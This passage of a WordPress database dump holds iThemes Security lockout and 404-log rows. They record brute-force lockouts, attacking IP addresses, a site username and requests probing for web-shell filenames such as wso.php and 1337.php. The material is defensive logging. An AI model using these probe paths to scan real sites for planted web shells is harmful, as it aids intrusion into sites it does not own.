21:17:09','194.35.233.114',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:14:\"194.35.233.114\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:8:\"zphiblgz\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(138,'brute_force','2021-06-16 16:36:43','2021-06-16 21:36:43','2021-06-16 16:51:43','2021-06-16 21:51:43','194.35.233.114',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:14:\"194.35.233.114\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:8:\"zphiblgz\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(139,'four_oh_four','2021-06-29 02:35:59','2021-06-29 07:35:59','2021-06-29 02:50:59','2021-06-29 07:50:59','152.32.171.98',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:13:\"152.32.171.98\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(140,'four_oh_four','2021-06-29 07:02:52','2021-06-29 12:02:52','2021-06-29 07:17:52','2021-06-29 12:17:52','152.32.171.98',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:13:\"152.32.171.98\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(141,'four_oh_four','2021-07-12 18:59:01','2021-07-12 23:59:01','2021-07-12 19:14:01','2021-07-13 00:14:01','20.48.236.142',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:13:\"20.48.236.142\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(142,'brute_force','2021-07-13 06:02:46','2021-07-13 11:02:46','2021-07-13 06:17:46','2021-07-13 11:17:46','45.72.78.41',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:11:\"45.72.78.41\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:5:\"admin\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(143,'brute_force','2021-07-19 15:22:20','2021-07-19 20:22:20','2021-07-19 15:37:20','2021-07-19 20:37:20','151.62.13.18',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:12:\"151.62.13.18\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:8:\"zphiblgz\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(144,'four_oh_four','2021-07-31 13:41:06','2021-07-31 18:41:06','2021-07-31 13:56:06','2021-07-31 18:56:06','34.67.189.232',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:13:\"34.67.189.232\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(145,'four_oh_four','2021-08-03 11:19:05','2021-08-03 16:19:05','2021-08-03 11:34:05','2021-08-03 16:34:05','203.159.80.189',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:14:\"203.159.80.189\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(146,'brute_force','2021-08-05 06:31:04','2021-08-05 11:31:04','2021-08-05 06:46:04','2021-08-05 11:46:04','93.140.145.219',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:14:\"93.140.145.219\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:8:\"zphiblgz\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(147,'brute_force','2021-08-05 07:27:31','2021-08-05 12:27:31','2021-08-05 07:42:31','2021-08-05 12:42:31','93.140.145.219',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:14:\"93.140.145.219\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:8:\"zphiblgz\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(148,'four_oh_four','2021-08-07 05:51:35','2021-08-07 10:51:35','2021-08-07 06:06:35','2021-08-07 11:06:35','20.106.130.133',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:14:\"20.106.130.133\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(149,'four_oh_four','2021-08-07 11:56:39','2021-08-07 16:56:39','2021-08-07 12:11:39','2021-08-07 17:11:39','23.88.42.188',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:12:\"23.88.42.188\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(150,'four_oh_four','2021-08-11 04:04:07','2021-08-11 09:04:07','2021-08-11 04:19:07','2021-08-11 09:19:07','37.0.8.185',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:10:\"37.0.8.185\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(151,'four_oh_four','2021-08-13 17:27:55','2021-08-13 22:27:55','2021-08-13 17:42:55','2021-08-13 22:42:55','148.251.195.248',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:15:\"148.251.195.248\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(152,'four_oh_four','2021-08-15 21:01:46','2021-08-16 02:01:46','2021-08-15 21:16:46','2021-08-16 02:16:46','167.71.197.231',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:14:\"167.71.197.231\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(153,'four_oh_four','2021-08-16 16:05:26','2021-08-16 21:05:26','2021-08-16 16:20:26','2021-08-16 21:20:26','194.127.179.205',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:15:\"194.127.179.205\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(154,'four_oh_four','2021-08-28 07:18:28','2021-08-28 12:18:28','2021-08-28 07:33:28','2021-08-28 12:33:28','119.160.116.175',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:15:\"119.160.116.175\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(155,'four_oh_four','2021-09-03 00:41:34','2021-09-03 05:41:34','2021-09-03 00:56:34','2021-09-03 05:56:34','34.136.122.56',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:13:\"34.136.122.56\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(156,'brute_force','2021-09-05 01:29:52','2021-09-05 06:29:52','2021-09-05 01:44:52','2021-09-05 06:44:52','61.253.143.95',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:13:\"61.253.143.95\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";i:1;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(157,'brute_force','2021-09-05 18:21:26','2021-09-05 23:21:26','2021-09-05 18:36:26','2021-09-05 23:36:26','5.156.35.20',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:11:\"5.156.35.20\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:8:\"zphiblgz\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(158,'brute_force','2021-09-06 12:30:49','2021-09-06 17:30:49','2021-09-06 12:45:49','2021-09-06 17:45:49','5.156.35.20',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:11:\"5.156.35.20\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:5:\"admin\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(159,'four_oh_four','2021-09-07 17:05:36','2021-09-07 22:05:36','2021-09-07 17:20:36','2021-09-07 22:20:36','119.91.96.98',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:12:\"119.91.96.98\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(160,'brute_force','2021-09-08 08:45:30','2021-09-08 13:45:30','2021-09-08 09:00:30','2021-09-08 14:00:30','92.251.12.244',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:13:\"92.251.12.244\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:8:\"zphiblgz\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(161,'four_oh_four','2021-09-16 14:38:57','2021-09-16 19:38:57','2021-09-16 14:53:57','2021-09-16 19:53:57','101.36.110.241',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:14:\"101.36.110.241\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(162,'brute_force','2021-09-20 04:15:38','2021-09-20 09:15:38','2021-09-20 04:30:38','2021-09-20 09:30:38','39.33.143.158',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:13:\"39.33.143.158\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:8:\"zphiblgz\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(163,'brute_force','2021-09-20 04:50:30','2021-09-20 09:50:30','2021-09-20 05:05:30','2021-09-20 10:05:30','39.33.143.158',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:13:\"39.33.143.158\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:8:\"zphiblgz\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}');
/*!40000 ALTER TABLE `lwz_itsec_lockouts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_itsec_logs`
--

DROP TABLE IF EXISTS `lwz_itsec_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_itsec_logs` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `parent_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `module` varchar(50) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `code` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `data` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `type` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'notice',
  `timestamp` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `init_timestamp` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `memory_current` bigint(20) unsigned NOT NULL DEFAULT '0',
  `memory_peak` bigint(20) unsigned NOT NULL DEFAULT '0',
  `url` varchar(500) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `blog_id` bigint(20) NOT NULL DEFAULT '0',
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `remote_ip` varchar(50) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `module` (`module`),
  KEY `code` (`code`),
  KEY `type` (`type`),
  KEY `timestamp` (`timestamp`),
  KEY `user_id` (`user_id`),
  KEY `blog_id` (`blog_id`),
  KEY `init_timestamp` (`init_timestamp`)
) ENGINE=MyISAM AUTO_INCREMENT=97339 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_itsec_logs`
--

LOCK TABLES `lwz_itsec_logs` WRITE;
/*!40000 ALTER TABLE `lwz_itsec_logs` DISABLE KEYS */;
INSERT INTO `lwz_itsec_logs` VALUES (96965,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"27\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631324658.3273699283599853515625;s:12:\"REQUEST_TIME\";i:1631324658;}}','notice','2021-09-11 01:44:19','2021-09-11 01:44:18',72333800,72418416,'https://zphiblgz.org/b.php',1,0,'185.191.34.215'),(96966,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631326548.875400066375732421875;s:12:\"REQUEST_TIME\";i:1631326548;}}','notice','2021-09-11 02:15:50','2021-09-11 02:15:49',72646056,72729800,'http://zphiblgz.org/x.php',1,0,'95.216.2.218'),(96967,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631326551.39647006988525390625;s:12:\"REQUEST_TIME\";i:1631326551;}}','notice','2021-09-11 02:15:53','2021-09-11 02:15:51',72604728,72688576,'http://zphiblgz.org/wso.php',1,0,'95.216.2.218'),(96968,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631326553.7693550586700439453125;s:12:\"REQUEST_TIME\";i:1631326553;}}','notice','2021-09-11 02:15:55','2021-09-11 02:15:54',72604728,72688576,'http://zphiblgz.org/srx.php',1,0,'95.216.2.218'),(96969,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631326556.2187709808349609375;s:12:\"REQUEST_TIME\";i:1631326556;}}','notice','2021-09-11 02:15:58','2021-09-11 02:15:56',72604752,72688592,'http://zphiblgz.org/1337.php',1,0,'95.216.2.218'),(96970,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631326558.7703878879547119140625;s:12:\"REQUEST_TIME\";i:1631326558;}}','notice','2021-09-11 02:16:00','2021-09-11 02:15:59',72604672,72688520,'http://zphiblgz.org/xx.php',1,0,'95.216.2.218'),(96971,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 